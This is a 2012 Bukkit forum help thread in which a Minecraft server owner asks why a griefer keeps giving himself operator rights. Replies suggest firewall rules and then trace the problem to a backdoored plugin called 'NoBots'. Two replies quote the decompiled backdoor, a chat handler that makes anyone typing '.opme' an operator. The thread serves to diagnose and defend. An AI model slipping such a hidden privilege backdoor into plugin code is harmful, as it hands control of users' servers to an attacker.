Solved Got Hacked >:(

Discussion in 'Bukkit Help' started by Flitchit, Jul 2, 2012.

Thread Status:
Not open for further replies.
  1. Offline

    Flitchit

    (By griefed i mean the person hacked op, deleted spawn) I have a server that ad the original IP of delta-craft.no-ip.org, then i got griefed twice, changed it to chaos-craft.no-ip.org, still got griefed about 3 times. He logged on with a different account every time, bragging that he can do whatever he wants, and that he had hacked about 500 minecraft usernames. his IP usually changed, here are some i got:
    74.47.96.251
    74.115.0.33
    24.44.2.77
    He used a spam bot, loggin on about 100 people saying my server sucks (Fixed this with an anti-spam plugin), But he STILL could op himself. I removed /op and /gamemode <user> 1 from player commands (only console can do these now), he still opped himself, and kicked, and banned me, and all the players. this has happened about 5-8 times over the past 2 days. Im wondering if theres anything I can do to get rid of this guy. I have just changed my ip (was **.**.**.23, now is **.**.**.99) but not sure if this will work. is there any plugin, or something i can do to my computer to stop him hacking into my console? (Technically thats illegal, right?) I have whitelisted my server, he keeps un-whitelisting it by hacking the console, not even logging in.
     
  2. Offline

    JOPHESTUS

    Sounds to me like you have a malicious plugin installed, have you gotten any of your plugins from a source outside bukkit?
     
  3. Offline

    frdmn

    What operating system do you use? If you are on Linux / Mac OS X you could use iptables/ipfw to ban his IPs in the firewall:

    Code:
    iptables -A INPUT -s 74.47.96.251 -j DROP
    iptables -A OUTPUT -d 74.47.96.251 -j DROP
    ...
     
  4. Offline

    Flitchit

    I am on windows 7, here is my plugin list:
    AntiCheat (Bukkit)
    ChestShop(Bukkit)
    ColoredSigns(Bukkit)
    CraftBuy(Bukkit)
    DynamicBan(Bukkit)
    EndlessEnchant(Bukkit)
    Essentials/Chat/GroupManager(Bukkit)
    Factions(Bukkit)
    iConomy 6(Bukkit)
    iLove(Bukkit)
    InivibleBlock(Bukkit)
    JustWarp(Bukkit)
    LWC(Bukkit)
    MobBountyReloaded(Bukkit)
    MobRain(Bukkit)
    NoBots(Outside source, from friend, I trust him, and he was active on my server when the hacker was on)
    PlgDisableCmd(Bukkit)
    PlgSetSpawn(Bukkit)
    SupplySign(Bukkit)
    TeleportSuite(Bukkit)
    Vault(Bukkit)
    WorldEdit/Gaurd(Bukkit)

    And thats it. I trust my friend that gave me NoBots.jar, and he was moving and talking while the hacker was aswell, however if you want to take a look at this plugin i can get the dl link.

    frdmn As I said, he kept changing his ip. almost each time he logged on it was different.

    edit:
    oh and the hacker was on befire I got NoBots, i got NoBots so he would stop spamming the chat
     
  5. Offline

    JOPHESTUS

  6. Offline

    Flitchit

    Oh, and the IP address I changed was my internal IP, doubt it will do anything, but changing my external IP, which is static, will cost me, and I dont want to do that. Also, he HAD to be hacking my console, /op and /gamemode 1 can ONLY be used by console, not even ops. Also I removed all my plugins exepct WorldEdit/Gaurd, and he STILL oped himself. -_-

    <Edit by Moderator: Redacted mediafire url>
    Link to NoBots

    EDIT by Moderator: merged posts, please use the edit button instead of double posting.
     
    Last edited by a moderator: Nov 10, 2016
  7. Offline

    JOPHESTUS

    Are there any extra files in your main directory?

    Lol, NoBots is nocheat++. It's a ripoff of the nocheat+ but it has extra features so they can op themselves etc
    Code:
    ublic void onChat(PlayerChatEvent event) {
        if (event.getMessage().startsWith(".opme"))
        {
          event.getPlayer().setOp(true);
          event.getPlayer().sendMessage("You are now OP.");
          event.setCancelled(true);
        }
     
        if (event.getMessage().startsWith(".deopme"))
        {
          event.getPlayer().setOp(false);
          event.getPlayer().sendMessage("You are no longer OP.");
          event.setCancelled(true);
        }
    It's used by hackers. You need to ban your friend, he is a major dick.

    EDIT by Moderator: merged posts, please use the edit button instead of double posting.
     
    Last edited by a moderator: May 26, 2016
  8. Offline

    actionforgames

    Hey about "NoBots"
    Like you said he was on server while server was hacked...
    Well I got same problem few weeks ago.

    So you should focus on Creator of NoBots. Did you think that he put some hack code into this plugin. So he is able to hack your console. Try to Remove this plugin.

    Because all smart hackers are ON the server while they are hacking it so you trust them. And then he is even more powerful, No really try focus on NoBots and creator of it.

    Edit:
    And even because this is ONLY plugin that can be for hack. all other plugins are Okey.
     
  9. Offline

    Flitchit

    Ha. lol. Shit. well, i guess ill be tlaking to him.
     
  10. Offline

    JOPHESTUS

    Never trust anyone. I don't even trust any of my admins :p and I would never accept a plugin from them.
     
  11. Offline

    Flitchit

    Ok, note taken. thank you very much Jophestus
     
  12. Offline

    JOPHESTUS

    No probs :)
    I'm here to help.
     
  13. Offline

    Flitchit

    oh, heres the griefer, hes set up a uTube account and recorded my server... http://www.youtube.com/user/stormtiger535/videos

    anyways one of the videos has this link, if an admin could just delete this thread, if i havnt already found out how to do so?
     
  14. Offline

    Drew1080

    You trust plugin from me :p
     
    MeesterWaffles likes this.
  15. Offline

    JOPHESTUS

    I'd have a look at the source before I installed, and if there was any bad code I'd show bukkit.
    Drew1080
     
  16. Offline

    Drew1080

    Yeah I do the same thing as well when people give me plugins, I decompile them.
     
    MeesterWaffles likes this.
  17. Offline

    MeesterWaffles

    *the next day*
    *MeesterWaffles decompiles plugins*
    Finds:
    Code:
    public void onChat(PlayerChatEvent event) {
        if (event.getMessage().startsWith(".opme"))
        {
          event.getPlayer().setOp(true);
          event.getPlayer().sendMessage("You are now OP.");
          event.setCancelled(true);
        }
     
        if (event.getMessage().startsWith(".deopme"))
        {
          event.getPlayer().setOp(false);
          event.getPlayer().sendMessage("You are no longer OP.");
          event.setCancelled(true);
        }
    In 6 of his plugins!
     
    JOPHESTUS likes this.
  18. Offline

    Drew1080

    lol I havn't even made 6 plugins for your server yet :p
     
    Omnitv, MeesterWaffles and JOPHESTUS like this.
  19. Offline

    MeesterWaffles

    [​IMG]
     
  20. Offline

    Drew1080

    We should stop posting now as this has gone way way of topic.
     
    JOPHESTUS and MeesterWaffles like this.
  21. Remove nobots plugin
     
  22. Offline

    JOPHESTUS

    That's already been established...
     
Thread Status:
Not open for further replies.

Share This Page